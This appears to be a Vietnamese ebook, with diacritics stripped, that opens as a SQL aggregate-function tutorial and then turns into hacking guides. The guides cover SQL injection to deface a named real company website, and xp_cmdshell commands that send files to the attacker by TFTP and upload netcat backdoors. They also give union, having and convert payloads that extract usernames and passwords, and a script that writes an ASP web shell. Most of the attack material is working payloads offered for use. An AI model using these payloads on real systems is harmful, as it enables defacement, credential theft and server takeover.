Bng d liu chng ta s dng trong cc v s tip theo:

Name Age Hansen, Ola 34 Svendson, Tove 45 Pettersen, Kari 19

Hm AVG(column)

Hm AVG tr v gi tr trung bnh tnh theo ct c ch nh ca cc dng c chn. Cc gi tr NULL s khng c xt n khi tnh gi tr trung bnh.

V d:

Cu lnh sau s tnh s tui trung bnh ca nhng ngi c tui trn 20:

SELECT AVG(Age) FROM Persons WHERE Age > 20

kt qu tr v s l:

39.5

Hm MAX(column)

Hm MAX tr v gi tr ln nht trong ct. Cc gi tr NULL s khng c xt n.

V d:

SELECT MAX(Age) FROM Persons

kt qu tr v:

45

Hm MIN(column)

Hm MAX tr v gi tr nh nht trong ct. Cc gi tr NULL s khng c xt n.

V d:

SELECT MIN(Age) FROM Persons

kt qu tr v:

19

Lu : Hm MIN v MAX cng c th p dng cho cc ct c d liu l chui vn bn. D liu trong ct s c so snh theo th t tng dn ca t in

Hm SUM(column)

Hm SUM tr v tng gi tr ca ct. Cc gi tr NULL s khng c xt n.

V d:

Tm tng s tui ca tt c nhng ngi c trong bng:

SELECT SUM(Age) FROM Persons

kt qu tr v:

98

V d:

Tm tng s tui ca tt c nhng ngi c tui ln hn 20:

SELECT SUM(Age) FROM Persons WHERE Age > 20

kt qu tr v:

79

GROUP BY v HAVING

Cc hm tp hp (v d nh SUM) thng thng cn thm chc nng ca mnh GROUP BY.

GROUP BY...

Mnh GROUP BY...c thm vo SQL bi v cc hm tp hp (nh SUM) tr v mt tp hp ca cc gi tr trong ct mi khi chng c gi, v nu khng c GROUP BY ta khng th no tnh c tng ca cc gi tr theo tng nhm ring l trong ct.

C php ca GROUP BY nh sau:

SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct

V d s dng GROUP BY:

Gi s ta c bng Sales nh sau:

Company Amount W3Schools 5500 IBM 4500 W3Schools 7100

Cu lnh SQL sau:

SELECT Company, SUM(Amount) FROM Sales

s tr v kt qu:

Company SUM(Amount) W3Schools 17100 IBM 17100 W3Schools 17100

Kt qu tr v trn i khi khng phi l ci m ta mong i. Ta thm mnh GROUP BY vo trong cu lnh SQL:

SELECT Company, SUM(Amount) FROM Sales GROUP BY Company

v kt qu tr v ln ny s l:

Company SUM(Amount) W3Schools 12600 IBM 4500

Kt qu ny ng l ci m ta mong mun.

HAVING...

Mnh HAVING...c thm vo SQL v mnh WHERE khng p dng c i vi cc hm tp hp (nh SUM). Nu khng c HAVING, ta khng th no kim tra c iu kin vi cc hm tp hp.

C php ca HAVING nh sau:

SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct HAVING SUM(tn_ct) iu_kin gi_tr

Ta s dng li bng Sales trn. Cu lnh SQL sau:

SELECT Company, SUM(Amount) FROM Sales GROUP BY Company HAVING SUM(Amount) > 10000

s tr v kt qu:

Company SUM(Amount) W3Schools 12600 B danh

Vi SQL, b danh c th c s dng cho tn ca ct v tn ca bng.

B danh ct:

C php b danh ct nh sau:

SELECT tn_ct AS b_danh_ct FROM tn_bng

B danh bng:

B danh bng c c php nh sau:

SELECT tn_ct FROM tn_bng AS b_danh_bng

V d s dng b danh ct:

Ta c bng Persons nh sau:

LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Pettersen Kari Storgt 20 Stavanger

Cu lnh SQL sau:

SELECT LastName AS H, FirstName AS Tn FROM Persons

S tr v kt qu:

H Tn Hansen Ola Svendson Tove Pettersen Kari

DeFace bng SQL injection, C bn

(by sinhcv)

FOR NEWBIE Hihi em xin tip tc,bi ny vn l c bn cho newbie,cn cao siu hn th em chu. y em xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc cu lnh update,insert ,drop,delete... trong SQL deFace. To 1 file c ni dung nh sau: <body> <form method="post" action="https://www.ford.com.vn/Tuyendung/Jobs_Search_Action.asp" name="frmSearch" onsubmit="return CheckSubmit();"> TIM KIEM <input name="txtSearch" size="40" class="clsText" type="text" size=2> </br> DIA DIEM <input type="text" name="SLocation" class="clsText" value="22"></br> JOB <input type="text" name="SJobCategory" class="clsText" value=""> </br> <input type=submit value="tim kiem"></br> </form> </body> Save as li thnh file xx.html,sau run nh sau TIM KIEM: xxx DIA DIEM: 22 JOB: 1' SQL command --

Trong database ca n c table Fordvn_news vi cc column MessageId','Status','Priority','Subject','Lead', 'Img','Posted','Edited','Published','FromIp','Body','ReadCount'

Tng ng vi trang news ca n https://www.ford.com.vn/News/News.asp y em xin chn ci subject deface vi messageid=146 Roi: y l cc cu lnh cn bit Insert into user ("id","pas") values (1,"xxx")-- /*thm 1 user xxx vo table user */ update user set pass="xxxx" where id=1-- /thay i pasword ca thng user c id=1 */ drop table user-- /*nguy him,xa table user */ drop database db-- /*rt nguy him/ delete from user where id=1-- /*xa column */ .............. y em dng update QUOTE TIM KIEM: xxx DIA DIEM: 22

JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--

Nu bn nhn dc 1 thng bo nh th ny thay v 1 thng bo li SQL th thnh cng ri QUOTE Khng tm c theo yu cu ca bn!

OK come on https://www.ford.com.vn/News/News.asp Bn cn c th lm dc nhiu th hn ti na,y ch l VD thoai. Good luck !!!

Hack server b SQL Injection

( Copyright by Windak ) ( --Thanks bro Aclatinh and bro MRRO-- )

1)T l thnh cng 80%: iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell (sa, dbo) check bn c th lm sau y trn inject link [injection link] %2b convert (int,(system_user()) Nu KQ l sa hoc dbo c l bn c th tn cng c ri. Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy bt n ln (bt th no t tm hiu nh ) Lu : bn s ch hack c vo server cha database ca n thi (nhiu khi t database chung vi host ) Cc tool cn thit : <-- t tm download

tftpd32 , backdoor +++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network 2) Tng bc tip cn a)Cc khi nim: Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cch khc, cch ny ca ti hack thng qua giao thc TFTP.

Ni s v giao thc TFTP : l mt giao thc truyn file server<->client . N hot ng tng t nh FTP nhng n gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y l iu quan trng ta hack)

Vo DOS g tftp /? -> Bn s c c php ca n nh sau : TFTP [-i] host PUT || GET filename [v tr file mun gi n] -i : nu bn cn truyn mt file dng binary hy s dng n host : IP ca my server PUT : nu bn mun send file GET : nu bn mun ly file V d v mt lnh tftp : Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trn my client (my g lnh trn)

By gi ta s test trc tip trn localhost. bn hy m tftpd32 ln bin my mnh thnh mt server tftp (lu phi tt ht firewall giao thc mi thc hin tt) Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mc t cc file up hoc download ca bn khi thc hin trao i file vi client (v bn l server) (bn c th change nu thch). Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp run exec (thm (), ( nu cn )

V dng <IP> thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32) Tn cng thc s: -------------------------------BEGIN---------------------------------Command1 : RUN COMMAND DOS trn my victim :

[link] exec master..xp_cmdshell [command]

Command 2 : DOWNLOAD FILE t my victim [link] exec master..xp_cmdshell tftp <IP> PUT [path][filecandown]

V d : Ly Ip my victim : (1)[link] exec master..xp_cmdshell ipconfig > a.txt (2)[link] exec master..xp_cmdshell tftp <IP> PUT a.txt ----Gii thch : (1) : run lnh ny : ipconfig >a.txt <=> to file a.txt vi ni dung l kt qu ca lnh ipconfig (2) : run tftp <IP> PUT a.txt <=> chuyn file a.txt vi ni dung va to --> server (my chng ta )

Command3 : UPLOAD BACKDOOR ln my victim : [link] exec master..xp_cmdshell tftp [i] <IP> GET backdoor [path muon backdoor c t]

v d : upload netcat vo C:\WINNT: [link] exec master..xp_cmdshell tftp i <IP> GET nc.exe C:\WINNT\nx.exe ----------------------------------END------------------------------

3) Kt:

Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, up file, hu nh lm ch c server ri y . Cn hack nhanh hay chm, hiu qu bao nhiu l do bn ( Nu test thy li g xin lin h http://shacker.computed.net/baivet/nangcao/windak88@yahoo.com ) Chc hack vuiy
vn SQL:

Hack Sql Inject nng cao

Cc bn th xem mt cu truy vn SQL: select id, forename, surname from authors th 'id','forename' v 'surname' l column ca table author,khi cu truy vn trn lm vic th n s cho kt qu tt c cc dng trong table author.Xem cu truy vn sau: select id, forename, surname from authors where forename = 'john' and surname = 'smith' y l cu truy vn c iu kin chc khng ni cc bn cng bit,n cho ra kt qu tt c nhng ai trong csdl vi forename = 'john' and surname = 'smith'

V vy khi vo gi tr u vo khng ng nh trong csdl liu:

Forename: jo'hn Surname: smith

Cu truy vn tr thnh: select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith' Cu truy vn trn khi c x l th n s pht sinh li:

Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'hn'.

L do l ta lng vo du nhy n "'" v gi tr vo tr thnh 'hn' sai so vi csdl vy s pht sinh li li dng ci ny attacker c th xo d liu ca bn nh sau:

Forename: jo'; drop table authors-Table author s b xa ->nguy him phi khng

Nhn vo on code asp sau:y l mt form login

<HTML> <HEAD> <TITLE>Login Page</TITLE> </HEAD> <BODY bgcolor='000000' text='cccccc'> <FONT Face='tahoma' color='cccccc'> <CENTER><H1>Login</H1> <FORM action='process_login.asp' method=post> <TABLE> <TR><TD>Username:</TD><TD><INPUT type=text name=username size=100%

Page 4

width=100></INPUT></TD></TR> <TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR> </TABLE> <INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'> </FORM> </FONT>

</BODY> </HTML> y l code 'process_login.asp' <HTML> <BODY bgcolor='000000' text='ffffff'> <FONT Face='tahoma' color='ffffff'> <STYLE> p { font-size=20pt ! important} font { font-size=20pt ! important} h1 { font-size=64pt ! important} </STYLE> <%@LANGUAGE = JScript %> <% function trace( str ) { if( Request.form("debug") == "true" ) Response.write( str ); } function Login( cn ) { var username; var password; username = Request.form("username"); password = Request.form("password"); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "'

and password = '" + password + "'"; trace( "query: " + sql ); rso.open( sql, cn ); if (rso.EOF) { rso.close(); %> <FONT Face='tahoma' color='cc0000'> <H1> <BR><BR> <CENTER>ACCESS DENIED</CENTER> </H1> </BODY> </HTML> <% Response.end return; } else { Session("username") = "" + rso("username"); %> <FONT Face='tahoma' color='00cc00'> <H1> <CENTER>ACCESS GRANTED<BR> <BR>

Welcome, <% Response.write(rso("Username")); Response.write( "</BODY></HTML>" ); Response.end } } function Main() { //Set up connection var username var cn = Server.createobject( "ADODB.Connection" ); cn.connectiontimeout = 20; cn.open( "localserver", "sa", "password" ); username = new String( Request.form("username") ); if( username.length > 0) { Login( cn ); } cn.close(); } Main(); %>

y l cu truy vn SQL:

var sql = "select * from users where username = '" + username + "'and password = '" + password + "'";

nu hacker vo nh sau:

Username: '; drop table users-Password:

th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht ri ti khng ni li na - ( Bn tham kho li Cn bn hack 1 website b li SQL Injection )

trng username hacker c th vo nh sau:

Username: ' union select 1, 'fictional_user', 'some_password', 1--

v d table user c to nh sau:

create table users( id int, username varchar(255), password varchar(255), privs int )

v insert vo:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff ) insert into users values( 0, 'guest', 'guest', 0x0000 ) insert into users values( 0, 'chris', 'password', 0x00ff )

insert into users values( 0, 'fred', 'sesame', 0x00ff )

Cc hacker s bit c kt qu cc column v table qua cu truy vn having 1=1

Username: ' having 1=1--

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35

Tip tc ly cc ci cn li:

Username: ' group by users.id having 1=1-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35

>> bit c column 'username'

' group by users.id, users.username, users.password, users.privs having 1=1--

Cho n khi khng cn bo li th dng li , vy l bn bit table v column cn khai thc ri, by gi n i ly gi tr ca n: xc nh ni dung ca column ta dng hm sum()

Username: ' union select sum(username) from users-[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35

Gi tr ca username l varchar,khng ni cc bn cng bit l do,cn dng vi id th sao nh:

Username: ' union select sum(id) from users-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /process_login.asp, line 35

Vy l ta c th insert vo csdl: Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--

Ly Version ca server:

Username: ' union select @@version,1,1,1-Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int. /process_login.asp, line 35

c th dng convert() nhng ti ch cc bn dng union ,cc bn th c ni dung ca cc user trogn table nh sau:

Username: ' union select min(username),1,1,1 from users where username > 'a'--

Chn gi tr nh nht ca username v cho n ln hn 'a' -> pht sinh li:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int. /process_login.asp, line 35

Vy l ta bit 'admin' acc tn ti,tip tc xem sao:

Username: ' union select min(username),1,1,1 from users where username 'admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int. /process_login.asp, line 35

Vy l khi c username -> ly pass:

Username: ' union select password,1,1,1 from users where username ='admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int. /process_login.asp, line 35

y l k thut m bn c th ly c user mt cch cao cp:

To mt script nh sau: begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end

->cu truy vn:

Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--

To mt table 'foo' vi mt column l 'ret'

Tip tc:

Username: ' union select ret,1,1,1 from foo-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. /process_login.asp, line 35

(Hnh nh mrro dng kiu ny vo VDC)

Xo du vt:

Username: '; drop table foo--

Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mng ca server lun,mt trong s cch :

1-S dng xp_cmdshell khi c quyn 'sa' 2-S dng xp_regread c register,bao gm SAM 3-Chy link query trn server 4-To script trn server khai thc 5-S dng 'bulk insert' c bt c file no trn h thng 6-S dng bcp to qun cho text file trn server 7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX) chy trn server

[xp_cmdshell]

Chc cc bn cng nghe nhiu ri v d: exec master..xp_cmdshell 'dir' exec master..xp_cmdshell 'net1 user'

S dng thi hnh cc lnh ca dos vvv.. rt hu hiu

[xp_regread]

Cc hm lin quan...

xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite

V d:

exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'

Xc inh null-session share c tn ti trn server

exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\va lidcommunities'

vv.. cn nhiu th na

[Other Extended Stored Procedures] services: exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server'

>ng qua cng bit n lm g...

[Importing text files into tables]

S dng 'bulk insert' chn text file vo th mc hin thi,to table n:

create table foo( line varchar(8000) ) tip tc: bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

[Creating Text Files using BCP]

VD: bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c Slocalhost -Usa -Pfoobar

[ActiveX automation scripts in SQL Server]

Dng 'wscript.shell'

vd:

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' Tren cu truy vn:

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

Dng 'scripting.filesystemobject' c file: declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

To script ASP thi hnh command:

declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>' y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh t nhng ch dn c bn ny.

Sql Inject M lnh

Ti bit chc rng cc bn y a s ch bit SQL injection bypass login, hm nay t xin mn php trnh by nhng k thut m ta c th lm nhiu iu hn l ch vt qua password ca mt trang b SQL injection. Lu : a s kin thc ca ti di y ch dng cho server chy MySQL, MSSQL, cn nhng ci khc th khng chc.... Nu bn cha bit lnh SQL th khng nn c bi ny m nn tham kho n trc, OKie ??? Ti khng mun thy nhng cu tr li i loi nh --- "Tui chng hiu g ht ", "Si u th" ,.....

1)Ly tn table v column hin hnh: Structure :

Login page (or any injection page):::: username: ' having 1=1--

KQ: ------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

-----------------------------------------> Ta c c TABLE VICTIM

Tip tc username: ' group by VICTIM.ID having 1=1--

KQ :--------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. ------------------------------------------Vy l ta c column Vuser

2) UNION nh m hiu qu

Vng tha cc bn, ta c th dng n ly c gn nh mi th . Trc ht ti xin ni s qua ci Structure ca n :

Login page ::::

username : ' Union select [column] from [table] where [column2=...]-password : everything

Vd: Gi s ta bit 2 column username v password trong table VTABLE cua db victim l VUSER v VPASS th ta lm nh sau

username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1) password : everything

(1) : Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n s cho bn user u tin

KQ:----------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. ---------------------------------

Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column ca table VTABLE c Union ht. Structure ca n nh sau:

username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1) password : everything

Bn hy thm ",1" cho n khi kt qu ra i loi nh

-------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int. --------------------------------

Nh vy Pass ca user 'admin' l 'tuibihackroi'

Vng tha cc bn SQL injection tht th v, v y l iu ta c th lm trong bi vit hm nay ca ti : Ly sch database ca i phng.

3) Ly ht value ca mt column bit trong mt table bit B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi trc): Vi Vuser l admin ta c th ly c cc user khc

-----Login Page :::::: username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) ------------------------Vng, sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in ( vd: Not in (admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(d nhin sau l mi password).

**** ly danh sch tn cc user theo mt quy nh m bn chn , v d chi ly cc user c cha t admin chng hn ta dng like : cu trc

-----Login Page :::::: username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like %admin% -------------------------

4) Ly ht table v column ca ca database: B quyt chnh l table ny ca database : INFORMATION_SCHEMA.TABLES vi column TABLE_NAME (cha ton b table) v table : INFORMATION_SCHEMA.COLUMNS vi column COLUMN_NAME (cha ton b column)

Cch s dng dng Union:

-----Login page :::::::

username: UNION SELECT TABLE_NAME,1,1,1,1 FROM INFORMATION_SCHEMA.TABLES WHERE . ---------------------------

Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :

-----Login page ::::::: username: UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and ---------------------------

Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn, cn lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho cc bn mt cht khi gp mt site b SQl injection

5) Khng cn UNION: Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert" mt cch d dng hn thu thp info qua cc thng bo li

Structure :

---login page::::

user : ' + convert (int,(select @@version))--------------------------

Trn l mt v d bn ly version, gi y mun ly bt c info no bn ch cn thay vo ci "select @@version" nhng nh nu l ln u tin get info th thm TOP 1 vo nh

vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2b

vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

6) Run command SQL :

run command bn c th dng du ";"

Structure :

login page ::::: user :' ; [command]------------------------------

vd: '; DROP TABLE VTABLE-Nu cc bn rnh v SQL th c th lm c rt nhiu iu th v qua ci ny , nhng t xin phn cho cc bn t nghin cu nh.

Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v trao di k nng bo mt. http://thegioiebook.com